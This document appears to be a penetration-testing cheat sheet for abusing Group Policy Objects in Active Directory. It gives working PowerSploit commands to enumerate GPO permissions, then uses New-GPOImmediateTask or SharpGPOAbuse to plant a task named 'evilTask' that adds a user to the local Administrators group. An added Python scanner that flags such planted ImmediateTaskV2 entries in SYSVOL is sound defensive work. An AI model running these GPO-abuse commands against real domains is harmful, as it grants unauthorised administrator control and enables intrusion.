Basics

Exploit

Enumerate

wget https://github.com/PowerShellMafia/PowerSploit/archive/26a0757612e5654b4f792b012ab8f10f95d391c9.zip -O PowerSploit.zip
unzip PowerSploit.zip
mv PowerSploit-26a0757612e5654b4f792b012ab8f10f95d391c9 PowerSploit
# Import to the Windows machine
  • On Windows
cd ~/AppData/Local/Temp/
upload PowerSploit
cd PowerSploit
Import-Module .\PowerSploit.psd1
# Import every sub-module, ignoring the ones that fail to load
gci -Directory | % { ipmo $_.FullName -ErrorAction SilentlyContinue }
  • Enumerate GPOs and their ACLs:
# Store username and group in variables
$username = 'OFFICE\hhogan'
$group = 'OFFICE\GPO Managers'
# Store GPOs in a variable
$gpos = Get-NetGPO
# Get the ACLs on each GPO
$gpoAcls = $gpos | ForEach-Object { Get-ObjectAcl -ResolveGUIDs -Name $_.Name }
# Enumerate any GPOs where we have access
$gpoAcls |
    Where-Object { $_.IdentityReference -in @($username, $group) } |
    Select-Object @{ Name = 'GPOName'; Expression = { $gpos | Where-Object distinguishedname -eq $_.ObjectDN | Select-Object -Expand DisplayName } },
                  IdentityReference, AccessControlType, ActiveDirectoryRights

Make our user a local admin

# With New-GPOImmediateTask
New-GPOImmediateTask -TaskName evilTask -Command cmd -CommandArguments "/c net localgroup administrators hhogan /add" -GPODisplayName "Default Domain Controllers Policy" -Verbose -Force
gpupdate /force

# Or with SharpGPOAbuse
SharpGPOAbuse.exe --AddLocalAdmin --UserAccount HHogan --GPOName "Default Domain Policy"
  • Log out and log back in!
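Added defensive counterpart, not from the original page: a Python scanner for the ScheduledTasks.xml that New-GPOImmediateTask writes into a GPO's Preferences folder under SYSVOL, flagging every ImmediateTaskV2 entry and rating the ones that edit the local Administrators group as high. The sample XML is constructed, and the element layout is my understanding of the Group Policy Preferences format (an assumption).

```python
# Added example (not from the original page): flag immediate scheduled tasks planted
# in a GPO's Preferences. New-GPOImmediateTask writes an <ImmediateTaskV2> element
# to <GPO>\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml in SYSVOL; the
# element layout below follows that file format as I understand it (assumption).
import re
import xml.etree.ElementTree as ET

# Command text that edits the local Administrators group, as in the page's payload.
ADMIN_GROUP_EDIT = re.compile(r"net(1)?(\.exe)?\s+localgroup\s+administrators", re.I)

# Constructed sample: one planted immediate task next to a routine TaskV2 entry.
SAMPLE_XML = """<ScheduledTasks clsid="{CC63F200-7309-4ba0-B154-A71CD118DBCC}">
  <ImmediateTaskV2 clsid="{9756B581-76EC-4169-9AFC-0CA8D43ADB5F}" name="evilTask">
    <Properties action="C" name="evilTask" runAs="NT AUTHORITY\\System" logonType="S4U">
      <Task version="1.2"><Actions Context="Author"><Exec>
        <Command>cmd</Command>
        <Arguments>/c net localgroup administrators hhogan /add</Arguments>
      </Exec></Actions></Task>
    </Properties>
  </ImmediateTaskV2>
  <TaskV2 clsid="{D8896631-B747-47a7-84A6-C155337F3BC8}" name="Inventory">
    <Properties action="C" name="Inventory" runAs="NT AUTHORITY\\System" logonType="S4U">
      <Task version="1.2"><Actions Context="Author"><Exec>
        <Command>powershell.exe</Command>
        <Arguments>-File C:\\scripts\\inventory.ps1</Arguments>
      </Exec></Actions></Task>
    </Properties>
  </TaskV2>
</ScheduledTasks>"""

def find_immediate_tasks(xml_text):
    """Return one finding per ImmediateTaskV2 (a run-once task on the next policy
    refresh, an unusual way to deploy software and the pattern the abuse tools use).
    Findings whose command edits the local Administrators group are rated high."""
    findings = []
    for task in ET.fromstring(xml_text).iter("ImmediateTaskV2"):
        props = task.find("Properties")
        run_as = props.get("runAs", "") if props is not None else ""
        for exe in task.iter("Exec"):
            cmd = (exe.findtext("Command") or "").strip()
            args = (exe.findtext("Arguments") or "").strip()
            command = f"{cmd} {args}".strip()
            severity = "high" if ADMIN_GROUP_EDIT.search(command) else "medium"
            findings.append({"task": task.get("name"), "runAs": run_as,
                             "command": command, "severity": severity})
    return findings

if __name__ == "__main__":
    for f in find_immediate_tasks(SAMPLE_XML):
        print(f"[{f['severity']}] {f['task']} runAs={f['runAs']}: {f['command']}")
```

Run it against each ScheduledTasks.xml under \\<domain>\SYSVOL\<domain>\Policies\; the routine TaskV2 entry in the sample is deliberately not reported, so a clean GPO yields no findings.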